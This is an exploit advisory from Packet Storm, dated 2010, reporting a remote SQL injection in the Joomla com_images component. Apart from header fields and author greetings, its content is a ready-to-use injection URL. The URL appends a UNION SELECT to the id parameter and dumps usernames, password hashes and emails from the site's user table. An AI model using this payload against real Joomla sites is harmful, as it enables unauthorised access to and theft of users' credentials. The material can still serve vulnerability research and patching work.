Joomla Images SQL Injection

2010-02-15T00:00:00
ID PACKETSTORM:86283
Type packetstorm
Reporter Snakespc
Modified 2010-02-15T00:00:00

Description

                                        
                                            `==============================================================================  
[»] Joomla com_images Remote Sql Injection Vulnerability  
==============================================================================  
  
[»] Script: [Joomla]  
[»] Language: [ PHP ]  
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]  
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]  
  
###########################################################################  
===[ Exploit ]===  
  
[»] http://server/index.php?option=com_images&task=view&id=-7+UNION%20SELECT%201,group_concat%28username,0x3a,password,0x3a,email%29,3,4,5,6,7,8,9,10,11+from+c_users  
[»]Author: Snakespc <-  
###########################################################################  
`